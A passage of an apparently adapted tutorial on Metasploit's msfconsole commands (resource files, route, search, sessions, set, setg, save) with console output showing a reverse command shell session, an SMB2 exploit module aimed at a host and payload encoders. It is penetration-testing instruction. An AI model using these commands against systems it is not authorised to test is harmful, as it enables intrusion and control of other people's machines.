resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn
...snip...

Batch files can greatly speed up testing and development times as well as allow the user to automate many tasks. Besides loading a batch file from within msfconsole, they can also be passed at startup using the -r flag. The simple example below creates a batch file that displays the Metasploit version number at startup.

root@kali:~# echo version > version.rc
root@kali:~# msfconsole -r version.rc

Frustrated alongside proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
+ -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
+ -- --=[ 330 payloads - 32 encoders - 8 nops      ]

[*] Processing version.rc for ERB directives.
resource (version.rc)> version
Framework: 4.8.2-2014022601
Console  : 4.8.2-2014022601.15168
msf >

   route: The route command in Metasploit allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number.

   search: The msfconsole includes an extensive regular-expression based search facility. If you have a general idea of what you are looking for, you can search for it via search. In the output below, a search is being made for EternalBlue. The search function will locate this string within the module names, descriptions, references, etc. Note that the naming convention for Metasploit modules uses underscores rather than hyphens.

   help: You can further refine your searches by using the built-in keyword system.

   name: To search using a descriptive name, use the name keyword.

   platform: You can use platform to narrow down your search to modules that affect a specific platform.

   type: Using the type keyword lets you filter by module type such as auxiliary, post, exploit, etc.

   author: Searching with the author keyword lets you search for modules by your favourite author.

   multiple: You can also combine multiple keywords together to further narrow down the returned results.

   sessions: The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.

      To list any active sessions, pass the -l option to sessions.


msf exploit(3proxy) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.101:33191 -> 192.168.1.104:4444

      To interact with a given session, you just need to use the -i switch followed by the Id number of the session.

msf exploit(3proxy) > sessions -i 1
[*] Starting interaction alongside 1...

C:\WINDOWS\system32>

   set: The set command allows you to configure Framework options and parameters for the current module you are working with.

msf auxiliary(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134
RHOST => 172.16.194.134
msf auxiliary(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.194.134   yes       The target address
   RPORT  445              yes       The target port
   WAIT   180              yes       The number of seconds to wait for the attack to complete.

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

      Metasploit also allows you to set an encoder to use at run-time. This is especially useful in exploit development when you aren't quite sure which payload encoding methods will work with a given exploit.

msf  exploit(ms09_050_smb2_negotiate_func_index) > show encoders

Compatible Encoders
===================

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   generic/none                             normal     The "none" Encoder
   x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
   x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
   x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
   x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
   x86/countdown                            normal     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                             low        Non-Alpha Encoder
   x86/nonupper                             low        Non-Upper Encoder
   x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                    manual     Single Static Bit
   x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

   unset: The opposite of the set command, of course, is unset. unset removes a parameter previously configured with set. You can remove all assigned variables with unset all.

msf > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > set THREADS 50
THREADS => 50
msf > set

Global
======

  Name     Value
  ----     -----
  RHOSTS   192.168.1.0/24
  THREADS  50

msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set

Global
======

No entries in data store.

msf >

   setg: In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You do this with the setg command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time you start msfconsole. However, the pitfall is forgetting that you have saved globals, so always check your options before you run or exploit. Conversely, you can use the unsetg command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136

      After setting your various variables, you can run the save command to save your current environment and settings. With your settings saved, they will be automatically loaded on startup, which saves you from having to set everything again.

msf > save
Saved configuration to: /root/.msf4/config
msf >
Read more at Offensive Security: MSFconsole and MSFconsole commands
